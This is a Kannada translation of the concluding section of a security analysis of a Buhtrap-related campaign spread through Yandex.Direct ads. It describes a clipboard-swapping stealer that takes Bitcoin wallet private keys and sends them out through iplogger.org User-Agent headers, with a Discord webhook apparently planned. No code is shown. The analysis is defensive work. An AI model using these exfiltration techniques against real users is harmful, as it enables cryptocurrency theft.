ಬಫರ್‌ನಲ್ಲಿ ವಿಳಾಸಗಳನ್ನು ಬದಲಿಸುವುದರ ಜೊತೆಗೆ, ಮಾಲ್‌ವೇರ್ ಬಿಟ್‌ಕಾಯಿನ್, ಬಿಟ್‌ಕಾಯಿನ್ ಕೋರ್ ಮತ್ತು ಎಲೆಕ್ಟ್ರಮ್ ಬಿಟ್‌ಕಾಯಿನ್ ವ್ಯಾಲೆಟ್‌ಗಳ ಖಾಸಗಿ ವೈಫ್ ಕೀಗಳನ್ನು ಗುರಿಯಾಗಿಸುತ್ತದೆ. ಪ್ರೋಗ್ರಾಂ WIF ಖಾಸಗಿ ಕೀಲಿಯನ್ನು ಪಡೆಯಲು plogger.org ಅನ್ನು ಹೊರಹಾಕುವ ಚಾನಲ್‌ನಂತೆ ಬಳಸುತ್ತದೆ. ಇದನ್ನು ಮಾಡಲು, ನಿರ್ವಾಹಕರು ಕೆಳಗೆ ತೋರಿಸಿರುವಂತೆ ಬಳಕೆದಾರ-ಏಜೆಂಟ್ HTTP ಹೆಡರ್‌ಗೆ ಖಾಸಗಿ ಕೀ ಡೇಟಾವನ್ನು ಸೇರಿಸುತ್ತಾರೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ ಮತ್ತು ಬುಹ್ಟ್ರಾಪ್ ಎನ್‌ಕ್ರಿಪ್ಟರ್ ಅನ್ನು Yandex.Direct ಬಳಸಿಕೊಂಡು ವಿತರಿಸಲಾಗಿದೆ
ಚಿತ್ರ 4. ಔಟ್‌ಪುಟ್ ಡೇಟಾದೊಂದಿಗೆ IP ಲಾಗರ್ ಕನ್ಸೋಲ್.

ವ್ಯಾಲೆಟ್‌ಗಳನ್ನು ಹೊರಹಾಕಲು ಆಪರೇಟರ್‌ಗಳು iplogger.org ಅನ್ನು ಬಳಸಲಿಲ್ಲ. ಕ್ಷೇತ್ರದಲ್ಲಿ 255 ಅಕ್ಷರಗಳ ಮಿತಿಯಿಂದಾಗಿ ಅವರು ಬಹುಶಃ ಬೇರೆ ವಿಧಾನವನ್ನು ಆಶ್ರಯಿಸಿದ್ದಾರೆ User-AgentIP ಲಾಗರ್ ವೆಬ್ ಇಂಟರ್ಫೇಸ್‌ನಲ್ಲಿ ಪ್ರದರ್ಶಿಸಲಾಗುತ್ತದೆ. ನಾವು ಅಧ್ಯಯನ ಮಾಡಿದ ಮಾದರಿಗಳಲ್ಲಿ, ಇತರ ಔಟ್‌ಪುಟ್ ಸರ್ವರ್ ಅನ್ನು ಪರಿಸರ ವೇರಿಯಬಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗಿದೆ DiscordWebHook. ಆಶ್ಚರ್ಯಕರವಾಗಿ, ಈ ಪರಿಸರ ವೇರಿಯಬಲ್ ಅನ್ನು ಕೋಡ್‌ನಲ್ಲಿ ಎಲ್ಲಿಯೂ ನಿಯೋಜಿಸಲಾಗಿಲ್ಲ. ಮಾಲ್‌ವೇರ್ ಇನ್ನೂ ಅಭಿವೃದ್ಧಿ ಹಂತದಲ್ಲಿದೆ ಮತ್ತು ವೇರಿಯಬಲ್ ಅನ್ನು ಆಪರೇಟರ್‌ನ ಪರೀಕ್ಷಾ ಯಂತ್ರಕ್ಕೆ ನಿಯೋಜಿಸಲಾಗಿದೆ ಎಂದು ಇದು ಸೂಚಿಸುತ್ತದೆ.

ಕಾರ್ಯಕ್ರಮವು ಅಭಿವೃದ್ಧಿಯಲ್ಲಿದೆ ಎಂಬುದಕ್ಕೆ ಮತ್ತೊಂದು ಚಿಹ್ನೆ ಇದೆ. ಬೈನರಿ ಫೈಲ್ ಎರಡು iplogger.org URL ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ, ಮತ್ತು ಡೇಟಾವನ್ನು ಹೊರಹಾಕಿದಾಗ ಎರಡನ್ನೂ ಪ್ರಶ್ನಿಸಲಾಗುತ್ತದೆ. ಈ URL ಗಳಲ್ಲಿ ಒಂದಕ್ಕೆ ವಿನಂತಿಯಲ್ಲಿ, ರೆಫರರ್ ಕ್ಷೇತ್ರದಲ್ಲಿನ ಮೌಲ್ಯವು "DEV /" ನಿಂದ ಮುಂಚಿತವಾಗಿರುತ್ತದೆ. ConfuserEx ಅನ್ನು ಬಳಸಿಕೊಂಡು ಪ್ಯಾಕೇಜ್ ಮಾಡದಿರುವ ಆವೃತ್ತಿಯನ್ನು ಸಹ ನಾವು ಕಂಡುಕೊಂಡಿದ್ದೇವೆ, ಈ URL ಅನ್ನು ಸ್ವೀಕರಿಸುವವರ ಹೆಸರು DevFeedbackUrl. ಪರಿಸರ ವೇರಿಯಬಲ್ ಹೆಸರನ್ನು ಆಧರಿಸಿ, ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್‌ಗಳನ್ನು ಕದಿಯಲು ನಿರ್ವಾಹಕರು ಕಾನೂನುಬದ್ಧ ಸೇವೆ ಡಿಸ್ಕಾರ್ಡ್ ಮತ್ತು ಅದರ ವೆಬ್ ಪ್ರತಿಬಂಧಕ ವ್ಯವಸ್ಥೆಯನ್ನು ಬಳಸಲು ಯೋಜಿಸುತ್ತಿದ್ದಾರೆ ಎಂದು ನಾವು ನಂಬುತ್ತೇವೆ.

ತೀರ್ಮಾನಕ್ಕೆ

ಈ ಅಭಿಯಾನವು ಸೈಬರ್ ದಾಳಿಗಳಲ್ಲಿ ಕಾನೂನುಬದ್ಧ ಜಾಹೀರಾತು ಸೇವೆಗಳ ಬಳಕೆಯ ಉದಾಹರಣೆಯಾಗಿದೆ. ಈ ಯೋಜನೆಯು ರಷ್ಯಾದ ಸಂಸ್ಥೆಗಳನ್ನು ಗುರಿಯಾಗಿಸುತ್ತದೆ, ಆದರೆ ರಷ್ಯನ್ ಅಲ್ಲದ ಸೇವೆಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಇಂತಹ ದಾಳಿಯನ್ನು ನೋಡಲು ನಾವು ಆಶ್ಚರ್ಯಪಡುವುದಿಲ್ಲ. ರಾಜಿ ತಪ್ಪಿಸಲು, ಬಳಕೆದಾರರು ತಾವು ಡೌನ್‌ಲೋಡ್ ಮಾಡುವ ಸಾಫ್ಟ್‌ವೇರ್‌ನ ಮೂಲದ ಖ್ಯಾತಿಯಲ್ಲಿ ವಿಶ್ವಾಸ ಹೊಂದಿರಬೇಕು.

ರಾಜಿ ಮತ್ತು MITER ATT&CK ಗುಣಲಕ್ಷಣಗಳ ಸೂಚಕಗಳ ಸಂಪೂರ್ಣ ಪಟ್ಟಿ ಇಲ್ಲಿ ಲಭ್ಯವಿದೆ ಲಿಂಕ್.

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ